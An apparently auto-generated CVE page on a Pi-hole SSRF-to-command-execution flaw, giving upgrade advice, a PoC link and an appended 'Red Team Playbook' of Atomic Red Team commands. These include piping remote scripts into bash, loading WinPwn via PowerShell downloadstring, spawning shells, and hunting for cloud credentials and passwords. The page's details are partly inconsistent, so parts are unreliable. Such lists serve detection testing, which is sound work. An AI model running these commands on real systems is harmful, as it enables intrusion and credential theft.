CVE-2024-34361
Overview
This vulnerability is a server-side request forgery (SSRF) with potential command injection due to improper validation in the gravity_DownloadBlocklistFromUrl() function of Pi-hole. The flaw exists in the internal request handling mechanism that processes URLs for blocklist downloads. The affected component is the gravity subsystem responsible for fetching and updating DNS blocklists, which does not adequately restrict or sanitize user-supplied URLs in versions prior to 5.18.3.
Vulnerability Description
Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue.
Impact
An attacker with valid authentication can exploit this vulnerability to perform unauthorized internal requests and potentially execute arbitrary commands on the Pi-hole server. This enables lateral movement or full server compromise within the network. The attack requires low privileges (authenticated user) and network access to the Pi-hole interface. The CVSS vector (AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) indicates network attack with high privileges required, but no user interaction, allowing for high-impact confidentiality, integrity, and availability breaches.
Solution
Upgrade Pi-hole to version 5.18.3 or later, which contains the patch for this vulnerability as detailed in the security advisory GHSA-jg6g-rrj6-xfg6. The fix is implemented in commit 2c497a9a3ea099079bbcd1eb21725b0ed54b529d on the official Pi-hole GitHub repository. Administrators should follow the vendor’s update instructions at https://github.com/pi-hole/pi-hole/security/advisories/GHSA-jg6g-rrj6-xfg6 to ensure the vulnerability is remediated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the DNS sinkhole solution, Pi-hole, arises from improper handling of internal requests within the `gravity_DownloadBlocklistFromUrl()` function. This flaw allows an authenticated user to manipulate the server's behavior, potentially leading to remote command execution. The issue is particularly concerning because it can be exploited by users who have legitimate access to the system, thus bypassing traditional perimeter defenses. The vulnerability exists in versions prior to 5.18.3, which underscores the importance of timely updates and patches in maintaining security posture.
Attack vectors for this vulnerability primarily involve authenticated users leveraging their access to issue crafted requests that the server processes without adequate validation. For instance, an attacker could exploit this flaw by sending specially formatted URLs to the `gravity_DownloadBlocklistFromUrl()` function, which could lead to the execution of arbitrary commands on the server. This scenario is particularly dangerous in environments where users may have varying levels of trust, as it opens the door for malicious insiders or compromised accounts to execute harmful actions. The exploitation could also be facilitated through social engineering tactics, where an attacker convinces a legitimate user to perform actions that trigger the vulnerability.
The real-world impact of this vulnerability can be significant, particularly for organizations relying on Pi-hole for network security and content filtering. If exploited, an attacker could gain control over the server, leading to unauthorized access to sensitive data, disruption of services, or even lateral movement within the network. The business risks associated with such an exploit include potential data breaches, loss of customer trust, regulatory penalties, and financial losses due to downtime or remediation efforts. Additionally, the reputational damage stemming from a successful attack could have long-lasting effects on an organization’s credibility and market position.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to version 5.18.3 or later is crucial, as this version contains the necessary patch to address the flaw. Regularly updating software and maintaining a robust patch management policy can significantly reduce the risk of exploitation. Furthermore, organizations should conduct thorough audits of user access levels to ensure that only trusted individuals have authenticated access to the Pi-hole server. Implementing network segmentation can also help limit the potential impact of an exploit by isolating critical systems from less secure environments.
In addition to these preventive measures, continuous monitoring of server logs and user activities can aid in the early detection of suspicious behavior that may indicate an attempted exploitation of the vulnerability. Employing intrusion detection systems (IDS) can further enhance security by providing real-time alerts on anomalous activities. Training employees on security best practices, including recognizing social engineering attempts, can help mitigate risks associated with insider threats. By adopting a comprehensive security strategy that encompasses software updates, access controls, monitoring, and user education, organizations can effectively safeguard their systems against this and similar vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Pi-Hole | Pi-Hole | All |
cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
T0X1Cx/CVE-2024-34361-Pi-Hole-SSRF-to-RCE
This repository contains an exploit for CVE-2024-34361, a critical Pi-hole vulnerability (CVSS 8.6). It uses SSRF to ach...
|
T0X1Cx | 1 | 0 | 2024-07-07 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
33%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-34361 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/pi-hole/pi-hole/security/advisories/GHSA-jg6g-rrj6-xfg6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/pi-hole/pi-hole/commit/2c497a9a3ea099079bbcd1eb21725b0ed54b529d |